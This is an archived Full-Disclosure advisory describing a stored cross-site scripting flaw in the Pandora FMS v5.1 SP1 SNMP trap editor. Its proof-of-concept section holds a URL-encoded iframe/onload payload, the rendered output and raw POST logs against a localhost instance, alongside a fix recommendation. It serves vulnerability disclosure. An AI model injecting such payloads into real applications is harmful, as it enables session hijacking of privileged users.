lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <54B8FE2B.7060003@evolution-sec.com>
Date: Fri, 16 Jan 2015 13:03:55 +0100
From: "admin@...lution-sec.com" <admin@...lution-sec.com>
To: fulldisclosure@...lists.org
Subject: [FD] Pandora FMS v5.1 SP1 - Persistent SNMP Editor Vulnerability

Document Title:
===============
Pandora FMS v5.1 SP1 - Persistent SNMP Editor Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1356


Release Date:
=============
2015-01-14


Vulnerability Laboratory ID (VL-ID):
====================================
1356


Common Vulnerability Scoring System:
====================================
3.4


Product & Service Introduction:
===============================
Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to 
know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement 
in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ 
new technology market. 

    * Detect new systems in network.
    * Checks for availability or performance.
    * Raise alerts when something goes wrong.
    * Allow to get data inside systems with its own lite agents (for almost every Operating System).
    * Allow to get data from outside, using only network probes. Including SNMP.


    * Get SNMP Traps from generic network devices. 
    * Generate real time reports and graphics.
    * SLA reporting.
    * User defined graphical views.
    * Store data for months, ready to be used on reporting.
    * Real time graphs for every module. 
    * High availability for each component.
    * Scalable and modular architecture.
    * Supports up to 2500 modules per server.
    * User defined alerts. Also could be used to react on incidents.
    * Integrated incident manager.
    * Integrated DB management: purge and DB compaction. 
    * Multiuser, multi profile, multi group.
    * Event system with user validation for operation in teams.
    * Granularity of accesses and user profiles for each group and each user.
    * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles. 

Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a 
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.

(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent web vulnerability in the official Pandora FMS v5.1 SP1 monitoring web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-14:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Artica Sulociones Tecnologicas
Product: Pandora FMS - Monitoring Web Application 5.1 SP1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Pandora FMS v5.1 SP1 monitoring web-application.
The vulnerability allows an attacker to inject own script code as payload to the application-side of the vulnerable service function or module.

The vulnerability is located in the `oid` and `custom_oid` value of the `snmp trap editor` module. Remote attackers with low privileged user accounts 
are able to manipulate the create POST method request of the `snmp trap editor` module to compromise user session information. The attack vector is 
persistent on the application-side and the request method to inject is POST. The issue allows to stream persistent malicious script codes to the 
front site of the `snmp trap editor` module were the `item context` becomes visible as list. Local low privileged application user accounts with 
access to the snmp editor can inject own malicious script code to steal session information of a higher privileged monitoring application user account.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious 
sources and application-side manipulation of affected or connected module context.

Request Method(s):
					[+] POST

Vulnerable Module(s):
					[+] SNMP > SNMP Trap Editor 

Vulnerable Parameter(s):
					[+] oid
					[+] custom_oid

Affected Module(s):
					[+] SNMP Trap Editor - Index


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user accounts 
and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps 
below to continue. 

Manual steps to reproduce the vulnerability ...
1. Open the pandora fms web-application and login with a low privileged user account that is allowed to access the monitoring snmp editor module
2. Surf to the SNMP > SNMP trap editor
3. Create a new entry to inject own payloads with script code to the OID & Customer OID input fields
4. Save the input
Note: The monitoring service refreshs to list after the POST method request to add and displays the stored items of the snmp trap editor
5. The execution occurs of the injected script code occurs on the application-side of the service in the item output listing of the snmp_trap_editor
6. Successful reproduce of the security vulnerability!


Payload: (SNMP trap editor - Create)
oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C
&custom_oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C">"
><iframe src="a" onload="alert("VL")" <="" "=""><iframe src=a onload=alert("VL") <


PoC: Exploit (SNMP trap editor - After the Create)
<table style="width:98%;" class="databox" id="table3" border="0" cellpadding="4" cellspacing="4"><thead><tr><th class="header c0" 
scope="col">OID</th><th class="header c1" scope="col">Custom OID</th><th class="header c2" scope="col">Severity</th><th class="header c3" 
scope="col">Text</th><th class="header c4" scope="col">Description</th><th class="header c5" scope="col">Actions</th></tr></thead>
<tbody>
<tr id="table3-0" style="" class="datos2">
<td id="table3-0-0" style="" class="datos2 "><a href="index.php?sec=estado&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form&
oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C&
custom_oid=%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C">"
><iframe src="a" onload="alert("VL")" <="" "=""><iframe src=a onload=alert("VL") <</a></td>
<td id="table3-0-1" style=""   class="datos2 ">


--- PoC Session Logs [POST] ---
Status: 200[OK]
 POST http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form 
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor&delete_trap=1&id=-1%27]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
      Cache-Control[max-age=0]
   POST-Daten:
      add_trap[1]
      crt[Create]
   Response Header:
      Date[Mon, 17 Nov 2014 00:38:29 GMT]
      Server[Apache/2.2.15 (CentOS)]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Set-Cookie[=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT
=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:38:29 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
 POST http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
   POST-Daten:
      oid[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      custom_oid[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      severity[2]
      text[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C+++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      description[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C++%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
      add_trap[1]
      submit[Create]
   Response Header:
      Date[Mon, 17 Nov 2014 00:40:05 GMT]
      Server[Apache/2.2.15 (CentOS)]
      X-Powered-By[PHP/5.3.3]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Set-Cookie[=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT
=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT; path=/
clippy=deleted; expires=Sun, 17-Nov-2013 00:40:05 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET http://fms.localhost:8080/pandora/%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!] 
Load Flags[LOAD_DOCUMENT_URI  ] Größe des Inhalts[295] Mime Type[text/html]
   Request Header:
      Host[fms.localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor]
      Cookie[PHPSESSID=21dq3ua37bcjcibptdn8uonk76]
      Connection[keep-alive]
   Response Header:
      Date[Mon, 17 Nov 2014 00:40:07 GMT]
      Server[Apache/2.2.15 (CentOS)]
      Content-Length[295]
      Connection[close]
      Content-Type[text/html; charset=iso-8859-1]


Reference(s):
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor_form
http://fms.localhost:8080/pandora/index.php?sec=snmpconsole&sec2=enterprise/godmode/snmpconsole/snmp_trap_editor
http://fms.localhost:8080/pandora/



Solution - Fix & Patch:
=======================
The security vulnerability can be patched by a secure restriction or filtering of the OID and customer OID input fields.
Encode and parse the input field context to prevent persistent execution of script code through the vulnerable snmp editor module.


Security Risk:
==============
The security risk of the application-side input validation web vulnerability in the pandora interface is estimated as medium. 
Lower privileged application user accounts are able to inject the code to steal session information and gain higher application access privileges.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@...lution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@...nerability-lab.com 	- research@...nerability-lab.com 	       		- admin@...lution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@...nerability-lab.com or research@...nerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™



-- 
COMPANY: Evolution Security GmbH - ADMINISTRATION
REPRESENTATIVES: Benjamin Kunz Mejri (DE)
LOCATION: HansRömhild Straße 14 @ 34128 Kassel (Hessen) in Germany
DOMAIN: www.evolution-sec.com
CONTACT: admin@...lution-sec.com
PGP KEY: http://evolution-sec.com/admin@evolution-sec.com%280x921A7E4C%29.asc

Phone: +49561-40064622 or 0561-40064622
Fax:  +49561-40066220 or 0561-40066220
Mobile:  +4915750765406 or 015750765406


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ